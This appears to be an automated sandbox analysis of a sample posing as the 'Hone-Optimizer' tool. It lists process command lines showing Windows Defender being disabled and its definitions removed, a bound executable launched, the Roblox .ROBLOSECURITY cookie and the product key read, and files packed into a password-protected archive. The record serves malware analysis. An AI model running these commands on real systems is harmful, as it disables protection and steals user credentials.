| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "MS-1033-110-WINMO-DNN" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR es-ES Locale Handler" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech SW Voice Activation - Japanese (Japan)" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{14E74C62-DC97-43B0-8F2F-581496A65D60}" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hedda" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\M1033Mark" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "5223743" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\r3082sr.lxa" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 4e003100000000006e59b55e1000486f6e6500003a0009000400efbe6e59b55e6e59c25e2e00000052500400000028000000000000000000000000000000313e7b0048006f006e006500000014000000 | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "409;9" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\lsr3082.lxa" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE/SOFTWARE\\Microsoft\\Speech_OneCore\\AudioOutput\\TokenEnums\\MMAudioOut\\" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{BAE3E62C-37D4-49AC-A6F1-0E485ECD6757}" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\c3082.fe" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR ja-JP Lookup Lexicon" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\MuiCache | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - English (United States)" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Laura" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 5e003100000000006e592b5f1000484f4e4552457e310000460009000400efbe6e59b55e6e592b5f2e0000005450040000002800000000000000000000000000000055f4df0048006f006e006500520065007600650072007400000018000000 | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "40C" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Near" | N/A | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
cURL User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6E5A.tmp\6E5B.tmp\6E5C.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\reg.exe
reg add HKLM /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\CrashControl" /v "DisplayParameters" /t REG_DWORD /d "1" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\reg.exe
reg add HKCU\CONSOLE /v VirtualTerminalLevel /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "Disclaimer"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rkt2fkxp\rkt2fkxp.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C35.tmp" "c:\Users\Admin\AppData\Local\Temp\rkt2fkxp\CSCA56DE6D1AF5D49FCBCBCAC41BC1EE192.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\n8T1k.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\n8T1k.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Hone" /v "Disclaimer" /f
C:\Windows\system32\curl.exe
curl -g -L -# -o "C:\Users\Admin\AppData\Local\Temp\Updater.bat" "https://raw.githubusercontent.com/auraside/HoneCtrl/main/Files/HoneCtrlVer"
C:\Windows\system32\Dism.exe
dism /online /enable-feature /featurename:MicrosoftWindowsWMICore /NoRestart
C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe {3F511729-BF4E-4763-8326-9B58EB2EF9F5}
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\', 'D:\', 'E:\', 'F:\', 'G:\'
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Unrestricted -NoProfile Checkpoint-Computer -Description 'Hone Restore Point'
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:4
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c date /t
C:\Windows\system32\reg.exe
reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKLM.reg /y
C:\Windows\system32\reg.exe
reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKCU.reg /y
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\System32\choice.exe
C:\Windows\System32\choice.exe /c:1234567XD /n /m " Select a corresponding number to the options above > "
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
